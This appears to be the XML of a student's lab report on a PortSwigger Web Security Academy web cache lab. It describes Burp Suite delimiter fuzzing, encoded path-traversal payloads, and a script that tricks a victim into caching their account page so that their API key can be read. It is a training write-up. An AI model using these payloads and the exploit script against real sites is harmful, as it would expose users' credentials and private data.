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Student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Aakash Singh</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Lab: Cache Poisoning</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Tool Used: Burp Suite</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Credentials: wiener:peter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identify and exploit cache poisoning vulnerability by analyzing path delimiter discrepancies, URL normalization issues, and cache behavior differences.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Step 1:Login.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Logged into application using wiener   peter.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5486400" cy="2962275"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="212595135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Step2: Request Finding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Navigated to /my-account from the http History.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Observed API key in response.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571080" cy="2716321"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="212595135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1080" cy="2716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Step 3: Test Path Behavior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/my-account/abc.js → 404 Not Found</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">/my-account;abc.js → 404 Not Found</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Conclusion: Server does NOT normalize paths.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520731" cy="2411799"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="212595135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0731" cy="2411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Step 4: Sniper Attack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Payload: /my-account§§abc</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Tested delimiters: ; / ? # &amp; .</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Result: Only '?' returned 200 OK.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After finding the proper payload send it to repeater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/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5486400" cy="2893060"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="212595135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Step 5: Normalization Testing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Payload: /ok/..%2fmy-account</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Result: 200 OK with API key.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Conclusion: Server decodes and resolves path</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5521111" cy="2669851"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="212595135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1111" cy="2669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5: Cache Behavior Analysis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Observed /resources directory.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Test: /ok/..%2fxyzmy-account.js</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">First request: X-Cache miss</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Second request: X-Cache hit</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Conclusion: Cache does NOT normalize path.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486400" cy="2834640"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="212595136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Step 7: Deliver Exploit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Script:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">&lt;script&gt;</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">document.location='https://0a4e00a703350d58805803c500fc.web-security-academy.net/resources/..%2fmy-account?wcd'&lt;/script&gt;</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5520130" cy="2240378"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="212595136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0130" cy="2240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Step 8: Retrieve Victim Data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URL: /resources/..%2fmy-account?wcd</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Result: Victim API key exposed.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5486400" cy="2849880"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="212595136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Successfully exploited cache poisoning vulnerability and retrieved sensitive data. </w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId15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 Black" w:cs="Arial Black" w:eastAsia="Arial Black" w:hAnsi="Arial Blac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WEB Cache LAB Post Swigger.</w:t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4.jpg"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7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header" Target="header1.xml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lo+SePWubl+v8uYeTuONhyfruQ==">CgMxLjA4AHIhMVY5SjNIUng4dnJLc3pmWmdBQVR5Q1c4bWVNQzE0WkYw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